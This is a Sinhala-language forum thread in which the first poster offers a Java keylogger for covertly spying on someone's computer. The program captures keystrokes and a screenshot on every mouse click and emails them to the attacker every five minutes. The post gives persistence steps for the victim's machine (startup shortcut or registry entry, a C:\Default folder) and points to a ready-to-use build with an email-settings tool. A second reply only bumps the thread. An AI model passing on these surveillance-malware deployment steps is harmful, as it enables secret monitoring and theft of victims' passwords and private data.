Java Keylogger

Hasistranger

Well-known member
  • Oct 21, 2010
    11,248
    1,449
    113
    Western Province, SL

    මම කලින් ත්‍රෙඩ් එකකින් (Simple Keylogger Using Java) ඔයාලට පෙන්නුවා ජාවා වලින් සරල keylogger එකක් හදන්නේ කොහොමද කියල , මම ඉතින් ඉන්න ගමන් එක තව ටිකක් වැඩි දියුණු කලා.මේ අලුත් keylogger එකේදී වෙන්නේ , අපි mouse එක click කරන වාරයක් වාරයක් පාසා Screenshot එකක් ගහල එක save කරගන්නවා.ඒ වගේම අපි මොනාහරි type කරලා keyboard එකේ Enter Button එක click කරපු ගමන් අපි ඒ type කරපු ඔක්කොම characters ටික file එකකට save කරගන්නවා.ඊට පස්සේ හැම විනාඩි 5කට සැරයක්ම මෙහෙම save කරගත්ත Screenshot ටිකයි , Keyboard strokes file එකයි අපි දීල තියෙන mail address එකකට send කරනවා.

    මේ program එකෙන් වැඩක් ගන්න නම් ,Hack කරන්න ඕනේ පුද්ගලයාගේ පරිගණකයේ මෙන්න මේ දේවල් කරලා තියෙන්න ඕනේ.


    • මෙම වැඩසටහන අදාළ පරිඝනකයේ ස්ථාපනය (copy) කරන්න ඕනේ lib folder එකත් සමගම.
    • startup folder එකේ මෙම වැඩසටහනට shortcut එකක් create කරන්න ඕනේ එහෙම නැත්තන් registry entry එකක් හදන්න ඕනේ application එක startup එකේදී run වෙන්න.
    • c: partition එකේ Default කියල folder එකක් හදන්න ඕනේ.(C:\Default).
    • එම අදාළ පරිඝනකයේ ජාවා ස්ථාපනය (install) කරලා තියෙන්න ඕනේ.


    මෙන්න මේ විදිහට settings ටික හදාගත්තනම් , අපිට ලේසියෙන්ම කව හරි පොඩි හැකින් පාරක් දාගන්න පුළුවන්.


    මේ program එක වැඩ කරන හැටි සහ machine එකට install කරන හැටි පහල වීඩියෝ වලින් බලාගන්න පුළුවන්.








    ඒ වගේම මේ program එක ගැන වැඩි විස්තර වගේම Netbeans Project එක පහල ලින්ක් එකෙන් මගේ බ්ලොග් එකට ගිහින් බාගන්න පුළුවන්. තව Netbeans වලින් වැඩ කරන්න දන්නේ නැති අයට සහ programming ගැන දැනුමක් නැති යට පහල ලින්ක් එකෙන් user settings හදන්න පුළුවන් software එක සහ settings application එක download කරගන්න පුළුවන්.

    Keylogger Complete Software With User Settings

    එකේදී කලින් විදිහටම ඔක්කොම files ටික අදාළ ස්ථාන වලට copy කරලා ඉවරවෙලා Keylogger_settings.jar කියන file එක double click කරලා open කරගන්න , ඊට පස්සේ එකේ තියෙන fields වලට අදාළ , sender email , sender email password සහ receiver email කියන විස්තර දීල save කියන button එක click කරන්න.එතනින් වැඩේ අහවරයි.




    මගේ බ්ලොග් එක.



    මම එහෙනම් පස්සේ දවසක තවත් ත්‍රෙඩ් එකකින් හම්බ වෙන්නම්. එතකන් කට්ටියටම ජයෙන් ජය.


     
    • Like
    Reactions: IreshMM

    shanur

    Well-known member
  • Dec 12, 2013
    906
    374
    63
    Kegalla
    පසු භාවිතය සදහා බම්ප්.............
    You must spread some Reputation around before giving it to Hasistranger again.